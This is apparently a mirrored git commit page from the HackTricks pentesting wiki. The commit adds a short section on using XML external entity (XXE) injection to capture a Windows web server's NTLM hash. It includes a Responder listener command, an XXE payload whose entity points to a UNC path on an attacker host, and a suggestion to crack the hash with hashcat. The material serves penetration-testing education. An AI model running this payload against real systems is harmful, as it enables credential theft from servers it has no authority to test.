mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
Updated XXE attacks by adding NTLM
Updated XXE attacks by adding a method to get NTML hash on Windows hosts
This commit is contained in:
parent
06e3bda49a
commit
e3c2d3ed88
1 changed files with 19 additions and 0 deletions
|
@ -423,6 +423,25 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (531).png>)
|
![](<../.gitbook/assets/image (531).png>)
|
||||||
|
|
||||||
|
### Getting NTML
|
||||||
|
|
||||||
|
On Windows hosts it is possible to get the NTML hash of the web server user by setting a responder.py handler:
|
||||||
|
|
||||||
|
```
|
||||||
|
Responder.py -I eth0 -v
|
||||||
|
```
|
||||||
|
|
||||||
|
and by sending the following request
|
||||||
|
|
||||||
|
```
|
||||||
|
<!--?xml version="1.0" ?-->
|
||||||
|
<!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
|
||||||
|
<data>&example;</data>
|
||||||
|
```
|
||||||
|
|
||||||
|
Then you can try to crack the hash using hashcat
|
||||||
|
|
||||||
|
|
||||||
# Hidden XXE Surfaces
|
# Hidden XXE Surfaces
|
||||||
|
|
||||||
## XInclude
|
## XInclude
|
||||||
|
|
Loading…
Reference in a new issue